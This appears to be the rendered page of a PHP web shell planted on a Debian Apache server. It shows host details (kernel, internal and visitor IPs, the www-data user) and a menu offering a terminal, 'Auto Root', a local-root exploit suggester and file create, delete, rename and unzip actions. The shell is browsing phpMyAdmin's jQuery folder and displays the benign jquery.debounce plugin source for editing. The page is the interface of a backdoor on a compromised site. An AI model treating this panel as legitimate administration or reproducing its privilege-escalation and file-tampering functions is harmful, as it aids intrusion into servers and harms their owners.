Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
phpmyadmin /
js /
vendor /
jquery /
Delete
Unzip
Name
Size
Permission
Date
Action
additional-methods.js
50.26
KB
-rw-r--r--
2023-02-07 21:35
jquery-migrate.min.js
13.16
KB
-rw-r--r--
2025-04-08 15:25
jquery-ui-timepicker-addon.js
76.71
KB
-rw-r--r--
2023-02-12 12:14
jquery-ui.min.js
317.01
KB
-rw-r--r--
2022-07-28 06:05
jquery.debounce-1.0.6.js
1.57
KB
-rw-r--r--
2023-02-07 21:35
jquery.min.js
86.95
KB
-rw-r--r--
2022-08-29 08:27
jquery.min.map
151.53
KB
-rw-r--r--
2022-08-29 08:27
jquery.mousewheel.js
8.07
KB
-rw-r--r--
2015-06-19 19:45
jquery.tablesorter.js
105.57
KB
-rw-r--r--
2021-11-21 21:19
jquery.uitablefilter.js
3.07
KB
-rw-r--r--
2023-02-07 21:35
jquery.validate.min.js
24.03
KB
-rw-r--r--
2025-04-08 15:25
Save
Rename
/** * Debounce and throttle function's decorator plugin 1.0.6 * * Copyright (c) 2009 Filatov Dmitry (alpha@zforms.ru) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/licenses/gpl.html * */ (function ($) { $.extend({ /** * Debounce's decorator * @param {Function} fn original function * @param {Number} timeout timeout * @param {Boolean} [invokeAsap=false] invoke function as soon as possible * @param {Object} [ctx] context of original function */ debounce: function (fn, timeout, invokeAsap, ctx) { if (arguments.length == 3 && typeof invokeAsap != 'boolean') { ctx = invokeAsap; invokeAsap = false; } var timer; return function () { var args = arguments; ctx = ctx || this; invokeAsap && !timer && fn.apply(ctx, args); clearTimeout(timer); timer = setTimeout(function () { invokeAsap || fn.apply(ctx, args); timer = null; }, timeout); }; }, /** * Throttle's decorator * @param {Function} fn original function * @param {Number} timeout timeout * @param {Object} [ctx] context of original function */ throttle: function (fn, timeout, ctx) { var timer, args, needInvoke; return function () { args = arguments; needInvoke = true; ctx = ctx || this; timer || (function () { if (needInvoke) { fn.apply(ctx, args); needInvoke = false; timer = setTimeout(arguments.callee, timeout); } else { timer = null; } })(); }; } }); })(jQuery);